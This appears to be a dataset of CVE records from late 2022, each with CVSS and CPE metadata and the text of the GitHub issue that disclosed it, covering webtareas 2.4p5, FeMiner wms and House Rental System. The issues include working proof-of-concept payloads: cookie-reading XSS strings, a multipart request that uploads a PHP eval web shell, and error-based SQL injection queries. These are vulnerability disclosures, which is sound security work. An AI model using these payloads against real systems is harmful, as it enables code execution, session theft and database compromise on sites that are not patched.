[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/11
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Clients" feature. # Proof of Concept **Step 1:** Go to "/clients/listclients.php?", click "Add" and insert payload "`<details/open/ontoggle=alert(document.cookie)>`" in "Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199563748-7e19fbac-2fc2-469a-9311-4ed675e30da2.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199563842-68899c34-a397-40f4-b795-64f4f1338df4.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Clients" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/11/comments
1
2022-11-02T17:48:51Z
2022-12-09T04:09:22Z
https://github.com/anhdq201/webtareas/issues/11
1,433,549,869
11
4,469
CVE-2022-44959
2022-12-02T20:15:14.967
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /meetings/listmeetings.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Meetings" feature. # Proof of Concept **Step 1:** Go to "/meetings/listmeetings.php?", click "Add" and insert payload "`<details/open/ontoggle=alert(document.cookie)>`" in "Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199560563-2bb3ad2b-d151-44b1-a90f-45b4ef42a3b7.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199560686-beae3295-e64c-4752-8ef6-6cd98402792e.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Meetings" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/6/comments
1
2022-11-02T17:34:26Z
2022-12-09T04:09:56Z
https://github.com/anhdq201/webtareas/issues/6
1,433,532,834
6
4,470
CVE-2022-44960
2022-12-02T20:15:15.023
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /general/search.php?searchtype=simple. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Search" feature. # Proof of Concept **Step 1:** Go to "/general/search.php?searchtype=simple", click "Search" and insert payload "`<details/open/ontoggle=alert(document.cookie)>`". --- ![image](https://user-images.githubusercontent.com/67278071/199556812-75bd3689-b245-4d55-8df8-03a775e9964e.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199556870-a23a8492-a78d-4037-be36-ae3a01e72246.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Reflect Cross Site Scripting Vulnerability Bypass filter on "Search" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/4/comments
1
2022-11-02T17:15:31Z
2022-12-09T04:11:42Z
https://github.com/anhdq201/webtareas/issues/4
1,433,508,329
4
4,471
CVE-2022-44961
2022-12-02T20:15:15.077
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /forums/editforum.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Forums" feature. # Proof of Concept **Step 1:** Go to "/forums/editforum.php?", click "Add" and insert payload "`<details/open/ontoggle=alert(document.cookie)>`" in "Name" field. --- ![image](https://user-images.githubusercontent.com/67278071/199561701-fc4309fe-b56d-41ef-b131-bf01e50c59f7.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199561826-68488121-dbf5-4220-85f6-dab243d52ee0.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Forums" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/7/comments
1
2022-11-02T17:38:14Z
2022-12-09T04:12:11Z
https://github.com/anhdq201/webtareas/issues/7
1,433,537,422
7
4,472
CVE-2022-44962
2022-12-02T20:15:15.133
webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /calendar/viewcalendar.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://webtareas.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/anhdq201/webtareas/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*", "matchCriteriaId": "94C4D4FE-5B6C-48AA-AFCC-C0BEDF27E9D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/anhdq201/webtareas/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "anhdq201", "webtareas" ]
# Version: 2.4p5 # Description An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Calendar" feature. # Proof of Concept **Step 1:** Go to "/calendar/viewcalendar.php?", click "Add" and insert payload "`<details/open/ontoggle=alert(document.cookie)>`" in "Subject" field. --- ![image](https://user-images.githubusercontent.com/67278071/199564199-d839cc4c-bc2a-420c-9801-2437b45f8530.png) --- **Step 2:** Alert XSS Message --- ![image](https://user-images.githubusercontent.com/67278071/199564237-65a5566d-5ffc-4479-93ef-7c740966242e.png) --- # Impact If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Calendar" feature in webtareas 2.4p5
https://api.github.com/repos/anhdq201/webtareas/issues/12/comments
3
2022-11-02T17:50:45Z
2022-12-09T04:20:17Z
https://github.com/anhdq201/webtareas/issues/12
1,433,551,961
12
4,473
CVE-2022-4272
2022-12-03T09:15:08.950
A vulnerability, which was classified as critical, has been found in FeMiner wms. Affected by this issue is some unknown functionality of the file /product/savenewproduct.php?flag=1. The manipulation of the argument upfile leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214760.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2023/04/26/1" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FeMiner/wms/issues/14" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.214760" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2023/04/26/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FeMiner/wms/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.214760" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warehouse_management_system_project:warehouse_management_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2B64B6B-5234-4C15-99B3-8B195D20872A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "266" ]
266
https://github.com/FeMiner/wms/issues/14
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FeMiner", "wms" ]
## WMS has a file upload code execution vulnerability ## Build environment: Apache 2.4.39; MySQL5.0.96; PHP5.3.29 ### 1.in /src/product/addproduct.php,On lines 242-246 of the code ![1129qddm](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1129qddm.png) Upfile is a parameter for uploading pictures, ### 2.Then we come to savenewproduct.php ![upfilehddm](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/upfilehddm.png) The upfile from POST is assigned to $upfile Then let's look at lines 45-64 of the code ![1129upfiledaima](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1129upfiledaima.png) It can be seen that the uploaded files are stored in the upimages directory, and the file naming rules are 1.jpg, 2.jpg, and then add 1 ### 3.Therefore, we can construct a poc to execute the file upload command POC: ``` POST /product/savenewproduct.php?flag=1 HTTP/1.1 Host: xxxx Content-Length: 1507 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://wmsvul.test Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryONFXfH9gn2T6Gxal User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://wmsvul.test/product/addproduct.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=qo4cusl0vp4mame43ssakta695 Connection: close ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="typeid" 0001 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="name" 123123123123 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="encode" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="barcode" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="size" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="unit" None ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="upperlimit" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="lowerlimit" 10 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="inprice" 1025 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="outprice" 123 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="MAX_FILE_SIZE" 2000000 ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="upfile"; filename="POC.php" Content-Type: application/octet-stream <?php @eval($_GET['ace']);?> ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="jianjie" ------WebKitFormBoundaryONFXfH9gn2T6Gxal Content-Disposition: form-data; name="submit" 添加 ------WebKitFormBoundaryONFXfH9gn2T6Gxal-- ``` Since the uploaded file was not verified, the PHP file was uploaded successfully and was named 1.php ![1129uploadsuccess](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1129uploadsuccess.png) Then, we access the PHP file to execute the code POC: ```html http://wmsvul.test/product/upimages/1.php?ace=phpinfo(); ``` ![1129phpinfo](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1129phpinfo.png)
WMS has a file upload code execution vulnerability
https://api.github.com/repos/FeMiner/wms/issues/14/comments
0
2022-11-29T14:50:54Z
2022-12-03T07:49:00Z
https://github.com/FeMiner/wms/issues/14
1,468,199,248
14
4,474
CVE-2022-4274
2022-12-03T16:15:09.917
A vulnerability, which was classified as critical, was found in House Rental System. Affected is an unknown function of the file /view-property.php. The manipulation of the argument property_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214770 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nikeshtiwari1/House-Rental-System/issues/6" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.214770" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nikeshtiwari1/House-Rental-System/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.214770" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:house_rental_system_project:house_rental_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "CCFC3381-1E5A-43F1-8930-099904962A98", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/nikeshtiwari1/House-Rental-System/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nikeshtiwari1", "House-Rental-System" ]
# Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4 ## SQL injection vulnerability in House Rental System In view property In PHP, from line 32 to line 34 of the code, property_ The ID is passed to the backend through get and assigned to the variable $property_ ID, and then executed the SQL statement query, and substituted it into the database. There is no single quotation mark protection, nor any filter function, and then returned mysqli_ Query Query Results ```php $property_id=$_GET['property_id']; $sql="SELECT * from add_property where property_id='$property_id'"; $query=mysqli_query($db,$sql); ``` POC: ```html http://xxx.com/view-property.php?property_id=124%27%20and%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20ace ``` ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1202user.png)
SQL injection vulnerability in House Rental System
https://api.github.com/repos/nikeshtiwari1/House-Rental-System/issues/6/comments
0
2022-12-02T01:45:04Z
2022-12-17T07:11:58Z
https://github.com/nikeshtiwari1/House-Rental-System/issues/6
1,472,190,546
6
4,475
CVE-2022-4275
2022-12-03T16:15:10.047
A vulnerability has been found in House Rental System and classified as critical. Affected by this vulnerability is an unknown functionality of the file search-property.php of the component POST Request Handler. The manipulation of the argument search_property leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214771.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nikeshtiwari1/House-Rental-System/issues/7" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.214771" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nikeshtiwari1/House-Rental-System/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.214771" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:house_rental_system_project:house_rental_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "CCFC3381-1E5A-43F1-8930-099904962A98", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/nikeshtiwari1/House-Rental-System/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nikeshtiwari1", "House-Rental-System" ]
# Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4 ## SQL injection vulnerability exists in search-property.php In search property In PHP, in lines 52-54 of the code, search_ The property is transferred to the backend through the post request and assigned to the variable $q_ String, and then it is substituted into the database for fuzzy query, and then mysqli is used_ The query function returns the result of the data query ```php $q_string = $_POST['search_property']; $sql="SELECT * FROM add_property where concat(zone,district,province,city,tole,property_type,country) like '%$q_string%'"; $query=mysqli_query($db,$sql); ``` POC: ```php+HTML 123' or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- ace ``` ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1202ssjm.png) SQL injection to obtain the current user ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1202user2.png)
SQL injection vulnerability exists in search-property.php
https://api.github.com/repos/nikeshtiwari1/House-Rental-System/issues/7/comments
0
2022-12-02T01:45:49Z
2022-12-17T07:11:51Z
https://github.com/nikeshtiwari1/House-Rental-System/issues/7
1,472,190,983
7
4,476
CVE-2022-4276
2022-12-03T16:15:10.143
A vulnerability was found in House Rental System and classified as critical. Affected by this issue is some unknown functionality of the file tenant-engine.php of the component POST Request Handler. The manipulation of the argument id_photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214772.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nikeshtiwari1/House-Rental-System/issues/8" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.214772" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/nikeshtiwari1/House-Rental-System/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.214772" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:house_rental_system_project:house_rental_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "CCFC3381-1E5A-43F1-8930-099904962A98", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/nikeshtiwari1/House-Rental-System/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "nikeshtiwari1", "House-Rental-System" ]
